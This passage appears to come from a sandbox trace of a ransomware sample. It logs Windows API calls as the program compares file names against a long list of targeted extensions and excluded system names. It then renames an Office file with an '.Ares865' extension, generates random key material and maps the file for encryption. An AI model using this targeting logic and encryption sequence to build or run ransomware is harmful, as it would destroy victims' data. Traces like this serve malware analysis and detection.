lpString2="maf") returned -1 [0087.348] lstrlenW (lpString="maq") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.348] lstrlenW (lpString="mar") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.348] lstrlenW (lpString="marshal") returned 7 [0087.348] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.348] lstrlenW (lpString="mas") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.348] lstrlenW (lpString="mav") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.348] lstrlenW (lpString="maw") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.348] lstrlenW (lpString="mdbhtml") returned 7 [0087.348] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.348] lstrlenW (lpString="mdn") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.348] lstrlenW (lpString="mdt") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.348] lstrlenW (lpString="mfd") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.348] lstrlenW (lpString="mpd") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.348] lstrlenW (lpString="mrg") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.348] lstrlenW (lpString="mud") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0087.348] lstrlenW (lpString="mwb") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.348] lstrlenW (lpString="myd") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.348] lstrlenW (lpString="ndf") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.348] lstrlenW (lpString="nnt") returned 3 [0087.348] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.348] lstrlenW (lpString="nrmlib") returned 6 [0087.349] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.349] lstrlenW (lpString="ns2") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.349] lstrlenW (lpString="ns3") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.349] lstrlenW (lpString="ns4") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.349] lstrlenW (lpString="nsf") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.349] lstrlenW (lpString="nv") returned 2 [0087.349] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.349] lstrlenW (lpString="nv2") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.349] lstrlenW (lpString="nwdb") returned 4 [0087.349] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.349] lstrlenW (lpString="nyf") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0087.349] lstrlenW (lpString="odb") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.349] lstrlenW (lpString="odb") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.349] lstrlenW (lpString="oqy") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.349] lstrlenW (lpString="ora") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.349] lstrlenW (lpString="orx") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.349] lstrlenW (lpString="owc") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.349] lstrlenW (lpString="p96") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.349] lstrlenW (lpString="p97") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.349] lstrlenW (lpString="pan") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.349] lstrlenW (lpString="pdb") returned 3 [0087.349] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.350] lstrlenW (lpString="pdm") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.350] lstrlenW (lpString="pnz") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.350] lstrlenW (lpString="qry") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.350] lstrlenW (lpString="qvd") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.350] lstrlenW (lpString="rbf") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.350] lstrlenW (lpString="rctd") returned 4 [0087.350] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.350] lstrlenW (lpString="rod") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.350] lstrlenW (lpString="rodx") returned 4 [0087.350] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.350] lstrlenW (lpString="rpd") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.350] lstrlenW (lpString="rsd") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.350] lstrlenW (lpString="sas7bdat") returned 8 [0087.350] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.350] lstrlenW (lpString="sbf") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.350] lstrlenW (lpString="scx") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.350] lstrlenW (lpString="sdb") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.350] lstrlenW (lpString="sdc") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.350] lstrlenW (lpString="sdf") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.350] lstrlenW (lpString="sis") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.350] lstrlenW (lpString="spq") returned 3 [0087.350] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.351] lstrlenW (lpString="te") returned 2 [0087.351] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0087.351] lstrlenW (lpString="teacher") returned 7 [0087.351] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.351] lstrlenW (lpString="tmd") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.351] lstrlenW (lpString="tps") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.351] lstrlenW (lpString="trc") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.351] lstrlenW (lpString="trc") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.351] lstrlenW (lpString="trm") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.351] lstrlenW (lpString="udb") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.351] lstrlenW (lpString="udl") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.351] lstrlenW (lpString="usr") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.351] lstrlenW (lpString="v12") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.351] lstrlenW (lpString="vis") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.351] lstrlenW (lpString="vpd") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.351] lstrlenW (lpString="vvv") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.351] lstrlenW (lpString="wdb") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.351] lstrlenW (lpString="wmdb") returned 4 [0087.351] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.351] lstrlenW (lpString="wrk") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.351] lstrlenW (lpString="xdb") returned 3 [0087.351] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.351] lstrlenW (lpString="xld") returned 3 [0087.352] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.352] lstrlenW (lpString="xmlff") returned 5 [0087.352] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.352] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.Ares865") returned 81 [0087.352] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.352] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.353] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1206112) returned 1 [0087.353] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.353] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.353] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.353] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.354] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.354] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.354] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x126a60, lpName=0x0) returned 0x15c [0087.355] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x126a60) returned 0x3030000 [0087.431] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.431] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.431] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.432] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0087.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0087.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.432] UnmapViewOfFile (lpBaseAddress=0x3030000) returned 1 [0087.443] CloseHandle (hObject=0x15c) returned 1 [0087.443] CloseHandle (hObject=0x118) returned 1 [0087.443] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.443] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.443] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.448] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7e38000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd7e38000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 1 [0087.448] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0087.448] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.448] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2=".") returned 1 [0087.448] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="..") returned 1 [0087.448] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="windows") returned 1 [0087.448] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="bootmgr") returned 1 [0087.449] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="temp") returned 1 [0087.449] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0087.449] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="boot") returned 1 [0087.449] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="ids.txt") returned 1 [0087.449] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0087.449] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="perflogs") returned 1 [0087.449] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="MSBuild") returned 1 [0087.449] lstrlenW (lpString="XLSLICER.DLL.trx_dll") returned 20 [0087.449] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll") returned 73 [0087.449] lstrcpyW (in: lpString1=0x2cce468, lpString2="XLSLICER.DLL.trx_dll" | out: lpString1="XLSLICER.DLL.trx_dll") returned="XLSLICER.DLL.trx_dll" [0087.449] lstrlenW (lpString="XLSLICER.DLL.trx_dll") returned 20 [0087.449] lstrlenW (lpString="Ares865") returned 7 [0087.449] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.449] lstrlenW (lpString=".dll") returned 4 [0087.449] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2=".dll") returned 1 [0087.449] lstrlenW (lpString=".lnk") returned 4 [0087.449] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2=".lnk") returned 1 [0087.449] lstrlenW (lpString=".ini") returned 4 [0087.449] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2=".ini") returned 1 [0087.449] lstrlenW (lpString=".sys") returned 4 [0087.449] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2=".sys") returned 1 [0087.449] lstrlenW (lpString="XLSLICER.DLL.trx_dll") returned 20 [0087.449] lstrlenW (lpString="bak") returned 3 [0087.449] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.449] lstrlenW (lpString="ba_") returned 3 [0087.449] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.449] lstrlenW (lpString="dbb") returned 3 [0087.449] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.449] lstrlenW (lpString="vmdk") returned 4 [0087.449] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.449] lstrlenW (lpString="rar") returned 3 [0087.449] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.449] lstrlenW (lpString="zip") returned 3 [0087.449] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.449] lstrlenW (lpString="tgz") returned 3 [0087.449] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.450] lstrlenW (lpString="vbox") returned 4 [0087.450] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.450] lstrlenW (lpString="vdi") returned 3 [0087.450] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.450] lstrlenW (lpString="vhd") returned 3 [0087.450] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.450] lstrlenW (lpString="vhdx") returned 4 [0087.450] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.450] lstrlenW (lpString="avhd") returned 4 [0087.450] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.450] lstrlenW (lpString="db") returned 2 [0087.450] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.450] lstrlenW (lpString="db2") returned 3 [0087.450] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.450] lstrlenW (lpString="db3") returned 3 [0087.450] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.450] lstrlenW (lpString="dbf") returned 3 [0087.450] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.450] lstrlenW (lpString="mdf") returned 3 [0087.450] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.450] lstrlenW (lpString="mdb") returned 3 [0087.450] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.450] lstrlenW (lpString="sql") returned 3 [0087.450] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.450] lstrlenW (lpString="sqlite") returned 6 [0087.450] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.450] lstrlenW (lpString="sqlite3") returned 7 [0087.450] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.450] lstrlenW (lpString="sqlitedb") returned 8 [0087.450] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.450] lstrlenW (lpString="xml") returned 3 [0087.450] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.450] lstrlenW (lpString="$er") returned 3 [0087.450] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.450] lstrlenW (lpString="4dd") returned 3 [0087.450] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.450] lstrlenW (lpString="4dl") returned 3 [0087.450] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.451] lstrlenW (lpString="^^^") returned 3 [0087.451] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.451] lstrlenW (lpString="abs") returned 3 [0087.451] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0087.451] lstrlenW (lpString="abx") returned 3 [0087.451] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.451] lstrlenW (lpString="accdb") returned 5 [0087.451] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.451] lstrlenW (lpString="accdc") returned 5 [0087.451] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.451] lstrlenW (lpString="accde") returned 5 [0087.451] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.451] lstrlenW (lpString="accdr") returned 5 [0087.451] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.451] lstrlenW (lpString="accdt") returned 5 [0087.451] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.451] lstrlenW (lpString="accdw") returned 5 [0087.451] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.451] lstrlenW (lpString="accft") returned 5 [0087.451] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.451] lstrlenW (lpString="adb") returned 3 [0087.451] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.451] lstrlenW (lpString="adb") returned 3 [0087.451] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.451] lstrlenW (lpString="ade") returned 3 [0087.451] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.451] lstrlenW (lpString="adf") returned 3 [0087.451] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.451] lstrlenW (lpString="adn") returned 3 [0087.451] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.451] lstrlenW (lpString="adp") returned 3 [0087.451] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0087.451] lstrlenW (lpString="alf") returned 3 [0087.451] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.451] lstrlenW (lpString="ask") returned 3 [0087.451] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.451] lstrlenW (lpString="btr") returned 3 [0087.451] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.451] lstrlenW (lpString="cat") returned 3 [0087.452] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.452] lstrlenW (lpString="cdb") returned 3 [0087.452] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.452] lstrlenW (lpString="ckp") returned 3 [0087.452] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.452] lstrlenW (lpString="cma") returned 3 [0087.452] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.452] lstrlenW (lpString="cpd") returned 3 [0087.452] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.452] lstrlenW (lpString="dacpac") returned 6 [0087.452] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.452] lstrlenW (lpString="dad") returned 3 [0087.452] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.452] lstrlenW (lpString="dadiagrams") returned 10 [0087.452] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0087.452] lstrlenW (lpString="daschema") returned 8 [0087.452] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.452] lstrlenW (lpString="db-journal") returned 10 [0087.452] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0087.452] lstrlenW (lpString="db-shm") returned 6 [0087.452] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.452] lstrlenW (lpString="db-wal") returned 6 [0087.452] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.452] lstrlenW (lpString="dbc") returned 3 [0087.452] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.452] lstrlenW (lpString="dbs") returned 3 [0087.452] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.452] lstrlenW (lpString="dbt") returned 3 [0087.452] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.452] lstrlenW (lpString="dbv") returned 3 [0087.452] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.452] lstrlenW (lpString="dbx") returned 3 [0087.452] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.452] lstrlenW (lpString="dcb") returned 3 [0087.452] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.452] lstrlenW (lpString="dct") returned 3 [0087.452] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.452] lstrlenW (lpString="dcx") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.453] lstrlenW (lpString="ddl") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.453] lstrlenW (lpString="dlis") returned 4 [0087.453] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.453] lstrlenW (lpString="dp1") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.453] lstrlenW (lpString="dqy") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.453] lstrlenW (lpString="dsk") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.453] lstrlenW (lpString="dsn") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.453] lstrlenW (lpString="dtsx") returned 4 [0087.453] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.453] lstrlenW (lpString="dxl") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.453] lstrlenW (lpString="eco") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.453] lstrlenW (lpString="ecx") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.453] lstrlenW (lpString="edb") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.453] lstrlenW (lpString="epim") returned 4 [0087.453] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.453] lstrlenW (lpString="fcd") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.453] lstrlenW (lpString="fdb") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.453] lstrlenW (lpString="fic") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.453] lstrlenW (lpString="flexolibrary") returned 12 [0087.453] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0087.453] lstrlenW (lpString="fm5") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.453] lstrlenW (lpString="fmp") returned 3 [0087.453] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.453] lstrlenW (lpString="fmp12") returned 5 [0087.454] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.454] lstrlenW (lpString="fmpsl") returned 5 [0087.454] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.454] lstrlenW (lpString="fol") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.454] lstrlenW (lpString="fp3") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.454] lstrlenW (lpString="fp4") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.454] lstrlenW (lpString="fp5") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.454] lstrlenW (lpString="fp7") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.454] lstrlenW (lpString="fpt") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.454] lstrlenW (lpString="frm") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.454] lstrlenW (lpString="gdb") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.454] lstrlenW (lpString="gdb") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.454] lstrlenW (lpString="grdb") returned 4 [0087.454] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.454] lstrlenW (lpString="gwi") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.454] lstrlenW (lpString="hdb") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.454] lstrlenW (lpString="his") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.454] lstrlenW (lpString="ib") returned 2 